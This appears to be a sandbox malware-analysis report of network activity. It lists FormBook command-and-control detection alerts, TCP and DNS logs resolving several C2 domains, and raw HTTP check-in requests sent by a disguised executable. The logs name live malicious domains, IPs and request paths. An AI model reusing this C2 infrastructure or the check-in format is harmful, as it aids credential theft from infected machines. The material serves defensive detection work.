                                                        2024-11-19T03:25:43.297083+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499553.33.130.19080TCP
                                                        2024-11-19T03:25:45.845642+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499673.33.130.19080TCP
                                                        2024-11-19T03:25:48.391343+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4499793.33.130.19080TCP
                                                        2024-11-19T03:25:48.391343+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4499793.33.130.19080TCP
                                                        2024-11-19T03:25:54.222386+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450008198.252.98.5480TCP
                                                        2024-11-19T03:25:56.807826+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450019198.252.98.5480TCP
                                                        2024-11-19T03:25:59.358599+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027198.252.98.5480TCP
                                                        2024-11-19T03:26:01.958343+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450028198.252.98.5480TCP
                                                        2024-11-19T03:26:01.958343+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450028198.252.98.5480TCP
                                                        2024-11-19T03:26:08.616555+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029103.224.182.24280TCP
                                                        2024-11-19T03:26:11.154468+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030103.224.182.24280TCP
                                                        2024-11-19T03:26:13.701826+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450031103.224.182.24280TCP
                                                        2024-11-19T03:26:16.234362+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450032103.224.182.24280TCP
                                                        2024-11-19T03:26:16.234362+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450032103.224.182.24280TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 19, 2024 03:24:43.160552979 CET4974280192.168.2.4154.92.61.37
                                                        Nov 19, 2024 03:24:43.165947914 CET8049742154.92.61.37192.168.2.4
                                                        Nov 19, 2024 03:24:43.167603970 CET4974280192.168.2.4154.92.61.37
                                                        Nov 19, 2024 03:24:43.182650089 CET4974280192.168.2.4154.92.61.37
                                                        Nov 19, 2024 03:24:43.187963009 CET8049742154.92.61.37192.168.2.4
                                                        Nov 19, 2024 03:24:44.212996006 CET8049742154.92.61.37192.168.2.4
                                                        Nov 19, 2024 03:24:44.213139057 CET4974280192.168.2.4154.92.61.37
                                                        Nov 19, 2024 03:24:44.214262962 CET4974280192.168.2.4154.92.61.37
                                                        Nov 19, 2024 03:24:44.219510078 CET8049742154.92.61.37192.168.2.4
                                                        Nov 19, 2024 03:24:59.280427933 CET4974980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:24:59.285469055 CET80497493.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:24:59.285563946 CET4974980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:24:59.294943094 CET4974980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:24:59.300018072 CET80497493.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:00.066063881 CET80497493.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:00.066293001 CET4974980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:00.805023909 CET4974980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:00.810089111 CET80497493.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:01.831418037 CET4976080192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:01.836586952 CET80497603.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:01.836699009 CET4976080192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:01.847518921 CET4976080192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:01.852358103 CET80497603.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:02.606349945 CET80497603.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:02.606408119 CET4976080192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:03.351697922 CET4976080192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:03.356657982 CET80497603.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.370434046 CET4977180192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:04.375777960 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.375874043 CET4977180192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:04.387840033 CET4977180192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:04.392832994 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.392896891 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.392925978 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.392961979 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.393012047 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.393063068 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.393090963 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.393136024 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:04.393167019 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:05.147711039 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:05.151591063 CET4977180192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:05.898596048 CET4977180192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:05.903600931 CET80497713.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:06.918265104 CET4978680192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:06.923418999 CET80497863.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:06.923507929 CET4978680192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:06.929385900 CET4978680192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:06.934389114 CET80497863.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:07.707968950 CET80497863.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:07.708142996 CET4978680192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:07.709348917 CET4978680192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:07.714232922 CET80497863.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:12.877881050 CET4981480192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:12.882976055 CET8049814203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:12.883083105 CET4981480192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:12.895323038 CET4981480192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:12.900321007 CET8049814203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:13.672975063 CET8049814203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:13.673162937 CET4981480192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:14.398602962 CET4981480192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:14.404933929 CET8049814203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:15.443599939 CET4982580192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:15.448904991 CET8049825203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:15.448995113 CET4982580192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:15.474059105 CET4982580192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:15.479001045 CET8049825203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:16.240983963 CET8049825203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:16.255470991 CET8049825203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:16.255654097 CET4982580192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:16.976877928 CET4982580192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:18.063751936 CET4984080192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:18.069294930 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.069782972 CET4984080192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:18.082515001 CET4984080192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:18.088093996 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.088134050 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.088192940 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.088222027 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.088248968 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.088274956 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.088301897 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.088351011 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.088378906 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.865684032 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:18.865756035 CET4984080192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:19.586226940 CET4984080192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:19.591294050 CET8049840203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:20.623960972 CET4985280192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:20.630260944 CET8049852203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:20.633724928 CET4985280192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:20.679512024 CET4985280192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:20.684937000 CET8049852203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:21.437161922 CET8049852203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:21.437278986 CET4985280192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:21.438142061 CET4985280192.168.2.4203.161.49.193
                                                        Nov 19, 2024 03:25:21.443057060 CET8049852203.161.49.193192.168.2.4
                                                        Nov 19, 2024 03:25:26.493652105 CET4987880192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:26.498909950 CET80498783.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:26.498996973 CET4987880192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:26.509589911 CET4987880192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:26.514808893 CET80498783.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:27.270555973 CET80498783.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:27.270615101 CET4987880192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:28.023927927 CET4987880192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:28.029124022 CET80498783.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:29.042228937 CET4989280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:29.047219992 CET80498923.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:29.047287941 CET4989280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:29.056792974 CET4989280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:29.061873913 CET80498923.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:29.826586962 CET80498923.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:29.826729059 CET4989280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:30.570748091 CET4989280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:30.575776100 CET80498923.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.589509964 CET4990380192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:31.594472885 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.594562054 CET4990380192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:31.606621981 CET4990380192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:31.611704111 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.611737013 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.611767054 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.611816883 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.611845970 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.611872911 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.611900091 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.611928940 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:31.611955881 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:32.372278929 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:32.373428106 CET4990380192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:33.117785931 CET4990380192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:33.122972965 CET80499033.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:34.147161007 CET4991580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:34.152657986 CET80499153.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:34.152760983 CET4991580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:34.160284996 CET4991580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:34.165643930 CET80499153.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:34.924463987 CET80499153.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:34.924642086 CET4991580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:34.925482988 CET4991580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:34.930632114 CET80499153.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:39.960144043 CET4994280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:39.965243101 CET80499423.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:39.965321064 CET4994280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:39.986674070 CET4994280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:39.991698980 CET80499423.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:40.746617079 CET80499423.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:40.747620106 CET4994280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:41.492417097 CET4994280192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:41.497591972 CET80499423.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:42.513632059 CET4995580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:42.518728018 CET80499553.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:42.518943071 CET4995580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:42.530179977 CET4995580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:42.537746906 CET80499553.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:43.296874046 CET80499553.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:43.297082901 CET4995580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:44.040874004 CET4995580192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:44.045861959 CET80499553.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.058765888 CET4996780192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:45.063836098 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.064066887 CET4996780192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:45.076742887 CET4996780192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:45.081748962 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.081772089 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.081849098 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.081866980 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.081908941 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.081918001 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.081979990 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.081989050 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.081999063 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.845568895 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:45.845642090 CET4996780192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:46.586441994 CET4996780192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:46.591684103 CET80499673.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:47.606477022 CET4997980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:47.611913919 CET80499793.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:47.611998081 CET4997980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:47.621228933 CET4997980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:47.626172066 CET80499793.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:48.391077995 CET80499793.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:48.391343117 CET4997980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:48.394051075 CET4997980192.168.2.43.33.130.190
                                                        Nov 19, 2024 03:25:48.398931980 CET80499793.33.130.190192.168.2.4
                                                        Nov 19, 2024 03:25:53.463922977 CET5000880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:53.469508886 CET8050008198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:53.469588041 CET5000880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:53.482558966 CET5000880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:53.487585068 CET8050008198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:54.221441031 CET8050008198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:54.222276926 CET8050008198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:54.222385883 CET5000880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:54.993169069 CET5000880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:56.039840937 CET5001980192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:56.045170069 CET8050019198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:56.045280933 CET5001980192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:56.072985888 CET5001980192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:56.078092098 CET8050019198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:56.807713985 CET8050019198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:56.807826042 CET5001980192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:57.586311102 CET5001980192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:57.591396093 CET8050019198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.608167887 CET5002780192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:58.613104105 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.613636017 CET5002780192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:58.658467054 CET5002780192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:25:58.664149046 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.664182901 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.664218903 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.664248943 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.664772987 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.664858103 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.664885998 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.664915085 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:58.664942980 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:59.358366013 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:25:59.358598948 CET5002780192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:26:00.164336920 CET5002780192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:26:00.169495106 CET8050027198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:26:01.183603048 CET5002880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:26:01.188865900 CET8050028198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:26:01.191649914 CET5002880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:26:01.199599028 CET5002880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:26:01.204924107 CET8050028198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:26:01.958087921 CET8050028198.252.98.54192.168.2.4
                                                        Nov 19, 2024 03:26:01.958343029 CET5002880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:26:01.959202051 CET5002880192.168.2.4198.252.98.54
                                                        Nov 19, 2024 03:26:01.964699030 CET8050028198.252.98.54192.168.2.4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 19, 2024 03:24:42.691760063 CET5445753192.168.2.41.1.1.1
                                                        Nov 19, 2024 03:24:43.149259090 CET53544571.1.1.1192.168.2.4
                                                        Nov 19, 2024 03:24:59.260906935 CET5522953192.168.2.41.1.1.1
                                                        Nov 19, 2024 03:24:59.277781010 CET53552291.1.1.1192.168.2.4
                                                        Nov 19, 2024 03:25:12.715853930 CET5832053192.168.2.41.1.1.1
                                                        Nov 19, 2024 03:25:12.875561953 CET53583201.1.1.1192.168.2.4
                                                        Nov 19, 2024 03:25:26.449377060 CET5954453192.168.2.41.1.1.1
                                                        Nov 19, 2024 03:25:26.490298033 CET53595441.1.1.1192.168.2.4
                                                        Nov 19, 2024 03:25:39.934137106 CET5393453192.168.2.41.1.1.1
                                                        Nov 19, 2024 03:25:39.957685947 CET53539341.1.1.1192.168.2.4
                                                        Nov 19, 2024 03:25:53.418591976 CET6552153192.168.2.41.1.1.1
                                                        Nov 19, 2024 03:25:53.460830927 CET53655211.1.1.1192.168.2.4
                                                        Nov 19, 2024 03:26:07.356255054 CET5522953192.168.2.41.1.1.1
                                                        Nov 19, 2024 03:26:07.824022055 CET53552291.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 19, 2024 03:24:42.691760063 CET192.168.2.41.1.1.10x10dbStandard query (0)www.huiguang.xyzA (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:24:59.260906935 CET192.168.2.41.1.1.10x4e86Standard query (0)www.beingandbecoming.ltdA (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:12.715853930 CET192.168.2.41.1.1.10x80cdStandard query (0)www.futurevision.lifeA (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:26.449377060 CET192.168.2.41.1.1.10x4f7dStandard query (0)www.schedulemassage.xyzA (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:39.934137106 CET192.168.2.41.1.1.10x8ccaStandard query (0)www.mcfunding.orgA (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:53.418591976 CET192.168.2.41.1.1.10x83daStandard query (0)www.migorengya8.clickA (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:26:07.356255054 CET192.168.2.41.1.1.10x86b2Standard query (0)www.klohk.techA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 19, 2024 03:24:43.149259090 CET1.1.1.1192.168.2.40x10dbNo error (0)www.huiguang.xyz154.92.61.37A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:24:59.277781010 CET1.1.1.1192.168.2.40x4e86No error (0)www.beingandbecoming.ltdbeingandbecoming.ltdCNAME (Canonical name)IN (0x0001)false
                                                        Nov 19, 2024 03:24:59.277781010 CET1.1.1.1192.168.2.40x4e86No error (0)beingandbecoming.ltd3.33.130.190A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:24:59.277781010 CET1.1.1.1192.168.2.40x4e86No error (0)beingandbecoming.ltd15.197.148.33A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:12.875561953 CET1.1.1.1192.168.2.40x80cdNo error (0)www.futurevision.life203.161.49.193A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:26.490298033 CET1.1.1.1192.168.2.40x4f7dNo error (0)www.schedulemassage.xyzschedulemassage.xyzCNAME (Canonical name)IN (0x0001)false
                                                        Nov 19, 2024 03:25:26.490298033 CET1.1.1.1192.168.2.40x4f7dNo error (0)schedulemassage.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:26.490298033 CET1.1.1.1192.168.2.40x4f7dNo error (0)schedulemassage.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:39.957685947 CET1.1.1.1192.168.2.40x8ccaNo error (0)www.mcfunding.orgmcfunding.orgCNAME (Canonical name)IN (0x0001)false
                                                        Nov 19, 2024 03:25:39.957685947 CET1.1.1.1192.168.2.40x8ccaNo error (0)mcfunding.org3.33.130.190A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:39.957685947 CET1.1.1.1192.168.2.40x8ccaNo error (0)mcfunding.org15.197.148.33A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:25:53.460830927 CET1.1.1.1192.168.2.40x83daNo error (0)www.migorengya8.clickmigorengya8.clickCNAME (Canonical name)IN (0x0001)false
                                                        Nov 19, 2024 03:25:53.460830927 CET1.1.1.1192.168.2.40x83daNo error (0)migorengya8.click198.252.98.54A (IP address)IN (0x0001)false
                                                        Nov 19, 2024 03:26:07.824022055 CET1.1.1.1192.168.2.40x86b2No error (0)www.klohk.tech103.224.182.242A (IP address)IN (0x0001)false
                                                        • www.huiguang.xyz
                                                        • www.beingandbecoming.ltd
                                                        • www.futurevision.life
                                                        • www.schedulemassage.xyz
                                                        • www.mcfunding.org
                                                        • www.migorengya8.click
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449742154.92.61.37802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:24:43.182650089 CET528OUTGET /hv6g/?jD=VzTtTZ&1H=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.huiguang.xyz
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.4497493.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:24:59.294943094 CET822OUTPOST /79tr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.beingandbecoming.ltd
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 199
                                                        Cache-Control: no-cache
                                                        Origin: http://www.beingandbecoming.ltd
                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
